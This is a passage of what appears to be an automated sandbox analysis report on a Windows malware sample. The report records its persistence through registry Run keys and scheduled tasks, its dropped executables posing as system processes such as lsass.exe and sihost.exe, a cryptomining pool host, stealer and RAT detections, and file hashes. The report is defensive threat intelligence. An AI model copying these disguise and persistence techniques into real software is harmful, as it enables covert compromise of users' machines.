                                          Detection:MAL
                                          Classification:mal100.spre.troj.spyw.expl.evad.mine.winEXE@91/54@2/0
                                          EGA Information:
                                          • Successful, ratio: 86.7%
                                          HCA Information:
                                          • Successful, ratio: 64%
                                          • Number of executed functions: 254
                                          • Number of non-executed functions: 206
                                          Cookbook Comments:
                                          • Found application associated with file extension: .exe
                                          • Exclude process from analysis (whitelisted): SIHClient.exe, WmiPrvSE.exe, schtasks.exe
                                          • Excluded IPs from analysis (whitelisted): 4.245.163.56, 13.85.23.206, 40.69.42.241, 40.126.32.72, 40.126.32.136, 40.126.32.138, 40.126.32.68, 20.190.160.22, 40.126.32.76, 20.190.160.20, 40.126.32.133, 13.107.253.44
                                          • Excluded domains from analysis (whitelisted): prdv4a.aadg.msidentity.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, www.tm.v4.a.prd.aadg.akadns.net, ctldl.windowsupdate.com, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, 468198cl.nyashtop.top, ocsp.digicert.com, login.live.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net, www.tm.lg.prod.aadmsa.trafficmanager.net
                                          • Execution Graph export aborted for target powershell.exe, PID 1460 because it is empty
                                          • Not all processes where analyzed, report is missing behavior information
                                          • Report creation exceeded maximum time and may have missing disassembly code information.
                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                          • Report size getting too big, too many NtCreateKey calls found.
                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                          • Report size getting too big, too many NtReadVirtualMemory calls found.
                                          TimeTypeDescription
                                          07:40:11API Interceptor1x Sleep call for process: twain_32.exe modified
                                          07:40:13API Interceptor64x Sleep call for process: powershell.exe modified
                                          07:40:28API Interceptor1x Sleep call for process: MpCmdRun.exe modified
                                          07:40:37AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run powershell "C:\Windows\appcompat\powershell.exe"
                                          07:40:48AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run lsass "C:\containerperf\lsass.exe"
                                          07:40:53API Interceptor355664x Sleep call for process: winlogon.exe modified
                                          07:40:57API Interceptor232504x Sleep call for process: lsass.exe modified
                                          07:40:59AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run sihost "C:\Program Files\Windows Defender\Platform\sihost.exe"
                                          07:41:00API Interceptor1334x Sleep call for process: svchost.exe modified
                                          07:41:02API Interceptor304502x Sleep call for process: dwm.exe modified
                                          07:41:04API Interceptor1212x Sleep call for process: dialer.exe modified
                                          07:41:08AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run WmiPrvSE "C:\Windows\en-GB\WmiPrvSE.exe"
                                          07:41:16AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run ServerComponenthostMonitorDll "C:\containerperf\ServerComponenthostMonitorDll.exe"
                                          07:41:25AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run powershell "C:\Windows\appcompat\powershell.exe"
                                          07:41:50AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run lsass "C:\containerperf\lsass.exe"
                                          07:42:27AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run sihost "C:\Program Files\Windows Defender\Platform\sihost.exe"
                                          12:40:25Task SchedulerRun new task: GoogleUpdateTaskMachineQC path: C:\Program Files\Google\Chrome\updater.exe
                                          12:40:34Task SchedulerRun new task: lsass path: "C:\containerperf\lsass.exe"
                                          12:40:34Task SchedulerRun new task: lsassl path: "C:\containerperf\lsass.exe"
                                          12:40:34Task SchedulerRun new task: powershell path: "C:\Windows\appcompat\powershell.exe"
                                          12:40:35Task SchedulerRun new task: powershellp path: "C:\Windows\appcompat\powershell.exe"
                                          12:40:35Task SchedulerRun new task: sihost path: "C:\Program Files\Windows Defender\Platform\sihost.exe"
                                          12:40:35Task SchedulerRun new task: sihosts path: "C:\Program Files\Windows Defender\Platform\sihost.exe"
                                          12:40:36Task SchedulerRun new task: WmiPrvSE path: "C:\Windows\en-GB\WmiPrvSE.exe"
                                          12:40:36Task SchedulerRun new task: WmiPrvSEW path: "C:\Windows\en-GB\WmiPrvSE.exe"
                                          12:40:42Task SchedulerRun new task: ServerComponenthostMonitorDll path: "C:\containerperf\ServerComponenthostMonitorDll.exe"
                                          12:40:42Task SchedulerRun new task: ServerComponenthostMonitorDllS path: "C:\containerperf\ServerComponenthostMonitorDll.exe"
                                          No context
                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          pool.hashvault.pro9d2h99wrj.exeGet hashmaliciousXmrigBrowse
                                          • 192.248.189.11
                                          Solara.exeGet hashmaliciousPython Stealer, Exela Stealer, XmrigBrowse
                                          • 192.248.189.11
                                          xmr new.exeGet hashmaliciousXmrigBrowse
                                          • 80.240.16.67
                                          eth.exeGet hashmaliciousXmrigBrowse
                                          • 192.248.189.11
                                          ZppxPm0ASs.exeGet hashmaliciousXmrigBrowse
                                          • 5.188.137.200
                                          file.exeGet hashmaliciousAmadey, LummaC Stealer, Vidar, XmrigBrowse
                                          • 5.188.137.200
                                          file.exeGet hashmaliciousAmadey, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                                          • 37.203.243.102
                                          file.exeGet hashmaliciousXmrigBrowse
                                          • 5.188.137.200
                                          file.exeGet hashmaliciousAmadey, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                                          • 5.188.137.200
                                          file.exeGet hashmaliciousXmrigBrowse
                                          • 37.203.243.102
                                          pastebin.comLoader.exeGet hashmaliciousUnknownBrowse
                                          • 104.20.4.235
                                          E6wUHnV51P.exeGet hashmaliciousDCRatBrowse
                                          • 104.20.3.235
                                          lrw6UNGsUC.exeGet hashmaliciousXWormBrowse
                                          • 104.20.4.235
                                          6mllsKaB2q.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                          • 172.67.19.24
                                          XClient.exeGet hashmaliciousXWormBrowse
                                          • 104.20.4.235
                                          18e568eb4ca89f8a3e4f04b1eb15472b55b4548f4d153.exeGet hashmaliciousDCRatBrowse
                                          • 104.20.3.235
                                          Solara_v3.exeGet hashmaliciousUnknownBrowse
                                          • 104.20.4.235
                                          Solara_v3.exeGet hashmaliciousUnknownBrowse
                                          • 104.20.3.235
                                          Drivespan.dllGet hashmaliciousUnknownBrowse
                                          • 104.20.3.235
                                          XClient.exeGet hashmaliciousXWormBrowse
                                          • 172.67.19.24
                                          bg.microsoft.map.fastly.netdocuments.exeGet hashmaliciousRemcosBrowse
                                          • 199.232.210.172
                                          YYYY-NNN AUDIT DETAIL REPORT .docxGet hashmaliciousUnknownBrowse
                                          • 199.232.210.172
                                          1972921391166218927.jsGet hashmaliciousStrela DownloaderBrowse
                                          • 199.232.214.172
                                          29522576223272839.jsGet hashmaliciousStrela DownloaderBrowse
                                          • 199.232.214.172
                                          1329220172182926612.jsGet hashmaliciousStrela DownloaderBrowse
                                          • 199.232.210.172
                                          29112223682907312977.jsGet hashmaliciousStrela DownloaderBrowse
                                          • 199.232.210.172
                                          179861427815317256.jsGet hashmaliciousStrela DownloaderBrowse
                                          • 199.232.210.172
                                          16910148382611315301.jsGet hashmaliciousStrela DownloaderBrowse
                                          • 199.232.214.172
                                          tesr.exeGet hashmaliciousLummaC StealerBrowse
                                          • 199.232.214.172
                                          https://link.mail.beehiiv.com/ss/c/u001.dSnm3kaGd0BkNqLYPjeMfxWXllAYaBQ5sAn4OVD0j89GQGPZtwQlLugE_8c0wQMKfkpy5_wJ66BvE1Ognfzf5MlQMAeZ1qYs5mgwUBu3TAc6279Q43ISHz-HkVRC08yeDA4QvKWsqLTI1us9a0eXx18qeAibsZhjMMPvES-iG2zoVABKcwKIVWyx95VTVcFMSh6AEN3OCUfP_rXFvjKRbIPMuhn_dqYr8yUBKJvhhlJR9FhTpZPAULxzMbsYWp8k/4cu/JfECY1HwRl-ipvrNOktVcw/h23/h001.ibQl2N4tDD79TTzErix_sFWEGLTTuM6dTVMrTg3y5DkGet hashmaliciousUnknownBrowse
                                          • 199.232.214.172
                                          No context
                                          No context
                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          C:\Users\user\AppData\Local\Temp\bcapgbqjwdsj.tmplauncher.exe.bin.exeGet hashmaliciousPureLog Stealer, Xmrig, zgRATBrowse
                                            Eulen.exeGet hashmaliciousXmrigBrowse
                                              zufmUwylvo.exeGet hashmaliciousFlesh Stealer, XmrigBrowse
                                                zufmUwylvo.exeGet hashmaliciousXmrigBrowse
                                                  test2.exeGet hashmaliciousXmrigBrowse
                                                    PasteHook.exeGet hashmaliciousAsyncRAT, DCRat, StormKitty, WorldWind Stealer, XmrigBrowse
                                                      hfi47s4wOT.exeGet hashmaliciousUnknownBrowse
                                                        https://oxy.st/d/SmUhGet hashmaliciousXmrigBrowse
                                                          SecuriteInfo.com.Win32.Evo-gen.6103.10668.exeGet hashmaliciousUnknownBrowse
                                                            H8Q1WRGrzw.exeGet hashmaliciousAsyncRAT, AveMaria, UACMe, VenomRAT, Xmrig, zgRATBrowse
                                                              Process:C:\Users\user\AppData\Local\Temp\twain_32.exe
                                                              File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                              Category:dropped
                                                              Size (bytes):6007384
                                                              Entropy (8bit):7.677631047166036
                                                              Encrypted:false
                                                              SSDEEP:98304:L019jVmxMBIJDBWUQ/HUh6Azh+Xfh/iQzNJQEiDJvybzC6SN:LaHBUQ/46ih+X5DQsbu6s
                                                              MD5:1FF26B7D334CD22E726CAF72A4208B96
                                                              SHA1:D2A1AD17E27C01072AC41D4D20426DD5CA7554AD
                                                              SHA-256:56ECE6BE060502193ED0360A8FF7D0633DC7E88D133B28B8A73DFB755D2134DB
                                                              SHA-512:787B02B048DAD824DD216A0B33872B2012FC8B2C47D831A33C4EB05399DF9A253BD30A8789659A7DA0EEA8535BB78705685AC67AE546D2F10210C7BA552B4F49
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                              • Antivirus: ReversingLabs, Detection: 79%
                                                              • Antivirus: Virustotal, Detection: 68%, Browse
                                                              Preview:MZ......................@.......................................hr......!..L.!This program cannot be run in DOS mode....$.......PE..d......f...............&......[..&.............@..............................\......[...`... ...............................................[.4.....[. ....`[.......[.X&....\.0...........................`L[.(.....................[.P............................text...............................`..`.data... SY......TY.................@....rdata...>... [..@....[.............@..@.pdata.......`[......D[.............@..@.xdata..<.....[......X[.............@..@.bss.... %....[..........................idata..4.....[......h[.............@....CRT....`.....[......t[.............@....tls..........[......v[.............@....rsrc... .....[......x[.............@....reloc..0.....\.......[.............@..B........................................................................................................................................................................
                                                              Process:C:\containerperf\ServerComponenthostMonitorDll.exe
                                                              File Type:ASCII text, with very long lines (372), with no line terminators
                                                              Category:dropped
                                                              Size (bytes):372
                                                              Entropy (8bit):5.805961461014327
                                                              Encrypted:false
                                                              SSDEEP:6:XuKYiIHXVSREdjrUI8ZnwvFAnyCGHlbYHH19bKAWv/WEA+qC/NSuoVOAHNC3SFr:f76AR4sLaFARGHFqH19bTWTA+JotgSJ
                                                              MD5:D93A42DA2E7983E996F12C9DCE375FAD
                                                              SHA1:512D61DEF16CF4928964B7C2532DBC423F448E35
                                                              SHA-256:B7DB16D5F359C15E091D7219F12A1C3450471FBF0534B6D7813299D22A04C513
                                                              SHA-512:8AA8E8EB6D072C6BF06C54F5EB12F8B7CDB18E0BBD1BF6B65E8C00008E74ADA48C086DAAEC35223D7A365E451E1B2CE6E89B821B6E098D293327A0D16844FB2B
                                                              Malicious:false
                                                              Preview:XsigLGRa4Us5HiJ37I89Lgq5PRBaBQpkbRW0xSbhRRWo71T14Y0W5dL0CmR3E1YopHezMTGpqar3JC8Y8KfnaSp7GfxKBhca2s8zWdpkSKpevRrAo354VvNWchtqf5oJ7RBbDIBee5UPmLLyyxfImiEGemXzt9FWgggeQP6f1baab8uQV51raghZM46bvMue07sForhj0AQKHopg1GdyHX6A9GRWSfuoq5kdPoloXS1aPWRiOajos6XdBsFhZLQVPleMDMRNezbzggvnztH26F5uiHcgiEPLCgKn1FeCJVK3eh6e6cspEXYKpun6tuoajPx9WHwtOEtl5CPAK7kGVjHoH97HbiSYrtUPu7Iyp9a9oxPnemww
                                                              Process:C:\containerperf\ServerComponenthostMonitorDll.exe
                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):68597760
                                                              Entropy (8bit):0.38816501086795074
                                                              Encrypted:false
                                                              SSDEEP:24576:1VJEBWEFKKqXYkSa7ixTVHMoepIQfm9Eymyg+mbqA72E27dyIkzdn3m2OxJ+NikO:1bxzV7id+7yTgJWA6ESkzdWnJc9n
                                                              MD5:01287AA2A0B5D2178CB13C477A04DC21
                                                              SHA1:884039BF4A15A820073CEF5A7D2022A97EF93C8C
                                                              SHA-256:4AF6BBCFF1CD1386DD5023BFBF76E9C532C8F466563768D40459E5CE9A40A52B
                                                              SHA-512:641D8FA8F22C57282139DB3192A50C7B84DAD0E4987327AD728A89BF65D533955589A4ACB31B17179856A4A159F3E2EA105EAAC5A5B255BD3B8E3C9B97973911
                                                              Malicious:true
                                                              Yara Hits:
                                                              • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files\Windows Defender\Platform\sihost.exe, Author: Joe Security
                                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Windows Defender\Platform\sihost.exe, Author: Joe Security
                                                              Antivirus:
                                                              • Antivirus: Avira, Detection: 100%
                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                              • Antivirus: ReversingLabs, Detection: 61%
                                                              • Antivirus: Virustotal, Detection: 49%, Browse
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...?:-g............................./... ...@....@.. ....................................@................................../..K....@.. ....................`....................................................... ............... ..H............text........ ...................... ..`.rsrc... ....@......................@....reloc.......`......................@..B................./......H...........H................H.../.......................................0..........(.... ........8........E........)...N...*...8....(.... ....~y...{....:....& ....8....*(.... ....~y...{....9....& ....8....(.... ....~y...{l...9....& ....8y......0.......... ........8........E................9.......H.......8.......... ....8....8.... ....~y...{....9....& ....8....8.... ....8....~....(M... .... .... ....s....~....(Q....... ....~y...{....:W...& ....8L.......~....(U...~....(Y... .
                                                              Process:C:\containerperf\ServerComponenthostMonitorDll.exe
                                                              File Type:ASCII text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):1396
                                                              Entropy (8bit):5.350961817021757
                                                              Encrypted:false
                                                              SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNrJE4qtE4KlOU4mZsXE4Npv:MxHKQwYHKGSI6oPtHTHhAHKKkrJHmHKu
                                                              MD5:EBB3E33FCCEC5303477CB59FA0916A28
                                                              SHA1:BBF597668E3DB4721CA7B1E1FE3BA66E4D89CD89
                                                              SHA-256:DF0C7154CD75ADDA09758C06F758D47F20921F0EB302310849175D3A7346561F
                                                              SHA-512:663994B1F78D05972276CD30A28FE61B33902D71BF1DFE4A58EA8EEE753FBDE393213B5BA0C608B9064932F0360621AF4B4190976BE8C00824A6EA0D76334571
                                                              Malicious:false
                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..2,"System.Security, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutr
                                                              Process:C:\Windows\System32\lsass.exe
                                                              File Type:very short file (no magic)
                                                              Category:modified
                                                              Size (bytes):1
                                                              Entropy (8bit):0.0
                                                              Encrypted:false
                                                              SSDEEP:3::
                                                              MD5:93B885ADFE0DA089CDF634904FD59F71
                                                              SHA1:5BA93C9DB0CFF93F52B521D7420E43F6EDA2784F
                                                              SHA-256:6E340B9CFFB37A989CA544E6BB780A2C78901D3FB33738768511A30617AFA01D
                                                              SHA-512:B8244D028981D693AF7B456AF8EFA4CAD63D282E19FF14942C246E50D9351D22704A802A71C3580B6370DE4CEB293C324A8423342557D4E5C38438F0E36910EE
                                                              Malicious:false
                                                              Preview:.
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):64
                                                              Entropy (8bit):0.34726597513537405
                                                              Encrypted:false
                                                              SSDEEP:3:Nlll:Nll
                                                              MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                              SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                              SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                              SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                              Malicious:false
                                                              Preview:@...e...........................................................
                                                              Process:C:\Users\user\Desktop\AstralprivateDLL.exe.bin.exe
                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):68919754
                                                              Entropy (8bit):0.4359980006212344
                                                              Encrypted:false
                                                              SSDEEP:24576:2TbBv5rUyXVNVJEBWEFKKqXYkSa7ixTVHMoepIQfm9Eymyg+mbqA72E27dyIkzdG:IBJNbxzV7id+7yTgJWA6ESkzdWnJc9nm
                                                              MD5:C28FADCE847B20E2442ABA2F2F9F5699
                                                              SHA1:6FF43DD7B53F0389D1E521B545DDE85345D9DE29
                                                              SHA-256:E142E7E883F59667BCEEB28EFDEF014447C4FF96A4F8A8210343E25F408D8284
                                                              SHA-512:325EC68858FC7E1927B60D56E832F90C070B7871C0A97606BF10563C7FD8C4B8D8CE3EC55B2AC0BDA1B3A92BBB572DC0ACAA7CFC338FFF586806338DAB8FC044
                                                              Malicious:true
                                                              Yara Hits:
                                                              • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\AppData\Local\Temp\Astral private DLL.exe, Author: Joe Security
                                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Local\Temp\Astral private DLL.exe, Author: Joe Security
                                                              Antivirus:
                                                              • Antivirus: Avira, Detection: 100%
                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                              • Antivirus: ReversingLabs, Detection: 62%
                                                              • Antivirus: Virustotal, Detection: 43%, Browse
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x_c.<>..<>..<>......1>.......>......$>...I.>>...I../>...I..+>...I...>..5F..7>..5F..;>..<>..)?...I...>...I..=>...I.=>...I..=>..Rich<>..........PE..L..... b............................0........0....@..........................P............@.........................p...4.......P....@....................... ..<#......T............................U..@............0..x....... ....................text............................... ..`.rdata.......0....... ..............@..@.data... G..........................@....didat.......0......................@....rsrc........@......................@..@.reloc..<#... ...$..................@..B................................................................................................................................................................................................................................................
                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                              File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x6e0, 10 symbols, created Mon Jan 13 14:22:05 2025, 1st section name ".debug$S"
                                                              Category:dropped
                                                              Size (bytes):1944
                                                              Entropy (8bit):4.543170152958725
                                                              Encrypted:false
                                                              SSDEEP:24:HXC9aOOQTUDfHrwKbNaluxOysuZhN7jSjRzPNnqpdt4+lEbNFjMyi0+WUZ:nES8KbEluOulajfqXSfbNtmhBZ
                                                              MD5:BB73FB65E5F2B1E24C45E5A68335BA9F
                                                              SHA1:BE023C0C396FC7DA06F5406FEAE026F54F4AE15C
                                                              SHA-256:EED030CBB86589DA4CE6C0DAD83E5AA5C6B2C1FA7157B2A83470E90066AB8C84
                                                              SHA-512:D560D726F33B8DA4BA1497368AA11206A41930FE60B441930BE971F7B28D3743A80761FFC3FA62835F4BF2C877E92144884CB29D37DC9C6C371AB25B0904A55E
                                                              Malicious:false
                                                              Preview:L....!.g.............debug$S........0...................@..B.rsrc$01................\...........@..@.rsrc$02........p...p...............@..@........;....c:\Windows\System32\CSCC4EE3A879404710AD2E4883A563BED.TMP...................r.av..t.y..............4.......C:\Users\user\AppData\Local\Temp\RESF04D.tmp.-.<....................a..Microsoft (R) CVTRES.X.=..cwd.C:\containerperf.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe....................... .......8.......................P.......................h.......................................................|...............................................|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.
                                                              Process:C:\containerperf\ServerComponenthostMonitorDll.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):25
                                                              Entropy (8bit):4.483856189774723
                                                              Encrypted:false
                                                              SSDEEP:3:uax2Rh3:uLL
                                                              MD5:739A24C5E6A879DF2221BD4E9851F73C
                                                              SHA1:A3692FE9AB051E3EE6EF00F7513C23D9B55C29C7
                                                              SHA-256:99BD646B66D7AFD9E5A3C4E5602EBFE1BDA736969E7BE64C3B21C34ED58D1CFF
                                                              SHA-512:7D80110A271A6E54E64FFF6FD6D37C7B59793A925B273B551670E4373235FC9FCE8BC839C96D45006ADD505D16DB5F10D20D182AE7B825C5A1EE18D019E5F795
                                                              Malicious:false
                                                              Preview:abOjFBThtnTE1CU2VKHkgIzaR
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
